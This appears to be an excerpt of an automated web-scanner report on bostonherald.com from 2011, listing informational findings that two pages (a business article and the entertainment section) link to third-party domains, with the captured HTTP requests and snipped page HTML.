<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/home-equity/?pid=p:bhn&amp;prods=50" class="sidebar-link">$30K HELOC</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=50&amp;prodtype=L&amp;ad=loan&amp;nav=heloc30k_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_ball.gif" width="11" height="1" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/auto/?pid=p:bhn&amp;prods=39" class="sidebar-link">48 month new car loan</a>
...[SNIP]...
<td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=39&amp;prodtype=A&amp;ad=auto&amp;nav=48mo_newcar_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_dn_brm.gif" width="11" height="6" vspace="4" /></td></tr><tr><td height="10" width="15" valign="top"><img src="http://www.bankrate.com/brm/images/brm_nd/bullet.gif" width="4" height="4" hspace="1" vspace="4" /></td><td height="10" width="125"><a href="http://www.bankrate.com/funnel/cd-investments/?pid=p:bhn&amp;prods=15&amp;local=true" class="sidebar-link">1 yr CD</a></td><td height="10" align="center" width="30"><a href="http://www.bankrate.com/bhn/graphs/graph_trend.asp?product=15&amp;prodtype=D&amp;ad=dep&amp;nav=1yearcd_graph&amp;page=default" class="sidebar-link"><img src="http://www.bankrate.com/brm/images/brm_nd/graph.gif" border="0" width="29" height="11" alt="Graph the three month trend" /></a>
...[SNIP]...
<td height="10" align="center"><img src="http://www.bankrate.com/brm/images/artwork/arrow_up_brm.gif" width="11" height="6" vspace="4" /></td>
...[SNIP]...
</div>


    <iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&amp;width=300&amp;height=300&amp;header=true&amp;colorscheme=light&amp;font&amp;border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.5. http://www.bostonherald.com/business/general/view.bg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /business/general/view.bg

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/general/view.bg?articleid=1312531&srvc=home&position=rated HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:12:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 47088

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
<meta name="PUBDATE" content="Friday, January 28, 2011" />

   <link rel="alternate" title="Business &amp; Markets - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/business/general/" type="application/rss+xml">

   <script type="text/javascript" language="JavaScript">
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fbusiness%2Fgeneral%2Fview.bg%3Farticleid%3D1312531%26position%3D0&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=email"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif"
       alt="Email" />
E-mail</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=text"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif"
       alt="Printable" />
Print</a>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
       alt="Comments" />
(80) Comments</a>
...[SNIP]...
<a href="#" onclick="textsize('up');return false" title="Increase font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif" alt="Larger" /></a><a href="#" onclick="textsize('down');return false" title="Decrease font size"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif" alt="Smaller" /></a>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'Wal-Mart seeks opening');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/business/general/view.bg?articleid=1312531&amp;format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />
(80) Comments&nbsp;&nbsp;|&nbsp;&nbsp;Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif">&nbsp;<b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
"Click to open photo gallery: Hey, neighborhood" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4882','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/2204fb_WalMart_12032009.JPG" alt="" /></A>
...[SNIP]...
<A HREF="javascript:void(0)" onclick="window.open('http://www.bostonherald.com/galleries/index.php?gallery_id=4882','gallery','width=1008,height=635,scrollbars=yes,resizable=yes')"><img class="ArticleImage" src="http://multimedia.heraldinteractive.com/images/galleries/20110128/stp/691198_WMgraphicB012811.jpg" alt="Boston Herald"></a>
...[SNIP]...
<div id="buyPhotosBar">
<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/business/general/view/20110123wal-mart_vs_civil_war_site_battle_heads_to_court/"><img src="http://multimedia.heraldinteractive.com/images/20110123/stp/d0a779_battle.jpg" alt="Wal-Mart vs. Civil War site: battle heads to court" /></a>
...[SNIP]...
<!--//include: NDN Video Tease //-->
<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_biz.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/>
</a>
...[SNIP]...

7.6. http://www.bostonherald.com/entertainment/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /entertainment/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /entertainment/?srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:05:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 103253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<!-- Ad: wallpaper takeover -->


   <link rel="alternate" title="Entertainment - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/entertainment/" type="application/rss+xml">

<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fentertainment%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<a href="http://bostonherald.com/entertainment/lifestyle/view.bg?articleid=1312514&position=0"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" height="261" width="315" alt="Ways to take the chill out of winter"></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniGallery.gif" alt="Gallery"><a href="http://bostonherald.com/entertainment/lifestyle/view.bg?articleid=1312514&position=0">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312524&position=1"><img class="blog_tease" src="http://multimedia.heraldinteractive.com/images/20110128/stp/bdc508_Rite_01282011.jpg" alt="ALL WRONG: Anthony Hopkins and Colin O&#x2019;Donoghue star in &#x2018;The Rite,&#x2019; an &#x2018;Exorcist&#x2019;-inspired thriller."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312524&position=0">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&srvc=edge&position=2"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/8345b6_Statham_01282011.jpg" alt="AUTO PILOT: Jason Statham kicks more butt than you can shake a wrench at in &#x2018;The Mechanic,&#x2019; a remake of the Charles Bronson film directed by Michael Winner."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/movies/reviews/view.bg?articleid=1312518&format=comments&srvc=edge&position=2">
...[SNIP]...
<a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&srvc=edge&position=3"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/bb4051_Banditas_01282011.jpg" alt="TWO OF A KIND: Hayley Thompson-King, left, and Molly Maltezos provide the harmony for Banditas."></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments.gif" alt="Comments"><a
href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&format=comments&srvc=edge&position=3">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniVideo.gif" alt="Video"><a href="http://bostonherald.com/entertainment/music/general/view.bg?articleid=1312501&position=0">
...[SNIP]...
<a href="/users/register/?pre_select=90">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/spread_the_love_177x57.gif" alt="Spread the Love" />
</a>
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127cheap_thrills">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/cheap_thrills_177x57.gif" alt="Cheap_thrills" />
</a>
...[SNIP]...
<a href="/entertainment/music/general/view/20110128gigs_music_for_your_weekend">
<img class="thumb" border="0" src="http://cache.heraldinteractive.com/images/version5.0/site_images/edge/gigs_around_town_177x57.gif" alt="Gigs_around_town" />
</a>
...[SNIP]...
<a href="/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/0c3b6e_Zenith_01282011.jpg" alt="MAD WORLD: Peter Scanavino stars in &#x2018;Zenith,&#x2019; about a dystopian future." /></a>
...[SNIP]...
<a href="/entertainment/television/general/view/20110128oprah_protege_nate_berkus_has_designs_on_daytime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/cccb20_nberkus012811.jpg" alt="Nate Berkus." /></a>
...[SNIP]...
<a href="/entertainment/lifestyle/view/20110128gotta_love_it/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110128/stp/31c0bc_ltpWatch012811.jpg" alt="Watch: &lsquo;Portlandia&rsquo;" /></a>
...[SNIP]...
<a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/ff0551_jlalanne012611.jpg" alt="In this Nov. 7, 1975 file photo, fitness expert Jack LaLanne, 61, comes out of the chilly water after a successful swim from the Marin County side along the Golden Gate Bridge to San Francisco." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/health/nutrition/view/20110126jack_lalanne_changed_exercising_but_he_didnt_change_many_bodies/format=comments&srvc=edge&position=also">
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/food_dining/reviews/view/20110128darryls_raises_bar_on_soul_food_music/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/39b0d8_garden_01272011.jpg" alt="CHILD&#x2019;S PLAY: Katherine Leigh Doherty, left, and Jennifer Beth Glick perform in &#x2018;The Secret Garden.&#x2019;" /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/arts_culture/view/20110127forever_young_theaters_the_fountain_of_youth_for_4-foot-11_harvard_law_instructor/format=comments&srvc=edge&position=also">
...[SNIP]...
<a href="/entertainment/fashion/view/20110127ready_aim_zap_at-home_laser_offers_new_wrinkle_in_the_fight_vs_crows_feet/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110126/stp/4149d9_eyes_01272011.jpg" alt="" /></a>
...[SNIP]...
<a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/srvc=edge&position=also"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/964bf5_rope_01272011.jpg" alt="ROPE SWING: Adventure comes alive at Disney&#x2019;s Animal Kingdom as intrepid explorers get up close and personal with park wildlife including hippos and crocodiles lurking over the edge of a cliff." /></a>
...[SNIP]...
<li><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/iconMiniComments2.gif" alt="Comments"><a href="/entertainment/travel/view/20110127disney_gone_wild_animal_kingdoms_new_tour_offers_an_african_safari_of_a_lifetime/format=comments&srvc=edge&position=also">
...[SNIP]...
<div id="rssBoxWhat">
                           <a target="_new" href="http://www.twitter.com">What is Twitter?</a>
...[SNIP]...
<div id="rssBoxWhat"><a href="http://www.feedburner.com/fb/a/feed101" taget="_new">What are RSS feeds?</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment" target="_new">All Entertainment</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/arts_culture/" target="_new">Arts & Culture</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/reviews/" target="_new">Movie Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/movies/" target="_new">Movie News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/" target="_new">Music News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/music/reviews/" target="_new">Disc Reviews</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/food_dining/" target="_new">Dining News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/health/" target="_new">Health & Fitness</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/travel/" target="_new">Travel</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/lifestyle/" target="_new">Lifestyle</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/fashion/" target="_new">Fashion</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/television/" target="_new">Television News</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/bostonherald/entertainment/books/" target="_new">Books</a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_enews.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_mobil.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_news.gif">
        </a>
...[SNIP]...
</h3>
        <img src="http://cache.heraldinteractive.com/images/version5.0/site_images/vertical_tools_herald_home.gif">
        </a>
...[SNIP]...
<a href="/blogs/lifestyle/fork_lift"><img src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/FORKLIFT_300x100.jpg" style="border: 1px #333 solid;" /></a>
...[SNIP]...
<a class="LinksRed2None" href="/blogs/entertainment/the_assistant/?srvc=edge&position=recent">
<img style="float:left; border:0;margin:0px 3px 0 0;padding:0;width:155px;height:50px;" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" border=0 />
</a>
...[SNIP]...
<a href="http://bostonherald.com/blogs/entertainment/the_assistant">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/the_assistant.jpg" alt="Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58" />
           Age Gap of the Week: Lydia Hearst, 26, and Jeff Goldblum, 58
           </a>
...[SNIP]...
<a href="http://www.bostonherald.com/blogs/entertainment/guestlisted">
           <img class="blogListEntryImage" src="http://cache.heraldinteractive.com/images/siteImages/blogLogos/guestlisted.jpg" alt="Exclusive video: Banditas strike!" />
           Exclusive video: Banditas strike!
           </a>
